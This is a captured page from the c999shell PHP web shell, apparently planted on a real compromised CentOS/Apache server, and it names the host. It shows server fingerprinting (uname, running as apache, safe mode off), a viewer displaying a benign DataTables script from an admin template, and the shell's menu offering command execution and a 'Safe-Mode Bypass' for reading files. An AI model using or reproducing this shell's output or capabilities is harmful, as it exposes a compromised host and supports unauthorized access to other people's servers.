Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/report/person/app-assets/js/scripts/datatables/ drwxr-xr-x |
Viewing file: datatable.js (3.95 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | /*========================================================================================= File Name: datatables-basic.js Description: Basic Datatable ---------------------------------------------------------------------------------------- Item Name: Vuexy - Vuejs, HTML & Laravel Admin Dashboard Template Author: PIXINVENT Author URL: http://www.themeforest.net/user/pixinvent ==========================================================================================*/ $(document).ready(function() { /**************************************** * js of zero configuration * ****************************************/ $('.zero-configuration').DataTable(); /******************************************** * js of Order by the grouping * ********************************************/ var groupingTable = $('.row-grouping').DataTable({ "columnDefs": [{ "visible": false, "targets": 2 }], "order": [ [2, 'asc'] ], "displayLength": 10, "drawCallback": function(settings) { var api = this.api(); var rows = api.rows({ page: 'current' }).nodes(); var last = null; api.column(2, { page: 'current' }).data().each(function(group, i) { if (last !== group) { $(rows).eq(i).before( '<tr class="group"><td colspan="5">' + group + '</td></tr>' ); last = group; } }); } }); $('.row-grouping tbody').on('click', 'tr.group', function() { var currentOrder = groupingTable.order()[0]; if (currentOrder[0] === 2 && currentOrder[1] === 'asc') { groupingTable.order([2, 'desc']).draw(); } else { groupingTable.order([2, 'asc']).draw(); } }); /************************************* * js of complex headers * *************************************/ $('.complex-headers').DataTable(); /***************************** * js of Add Row * ******************************/ var t = $('.add-rows').DataTable(); var counter = 2; $('#addRow').on( 'click', function () { t.row.add( [ counter +'.1', counter +'.2', counter +'.3', counter +'.4', counter +'.5' ] ).draw( false ); counter++; }); /************************************************************** * js of Tab for COLUMN SELECTORS WITH EXPORT AND PRINT OPTIONS * ***************************************************************/ $('.dataex-html5-selectors').DataTable( { dom: 'Bfrtip', buttons: [ { extend: 'copyHtml5', exportOptions: { columns: [ 0, ':visible' ] } }, { extend: 'pdfHtml5', exportOptions: { columns: ':visible' } }, { text: 'JSON', action: function ( e, dt, button, config ) { var data = dt.buttons.exportData(); $.fn.dataTable.fileSave( new Blob( [ JSON.stringify( data ) ] ), 'Export.json' ); } }, { extend: 'print', exportOptions: { columns: ':visible' } } ] }); /************************************************** * js of scroll horizontal & vertical * **************************************************/ $('.scroll-horizontal-vertical').DataTable( { "scrollY": 200, "scrollX": true }); }); |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.016 ]-- |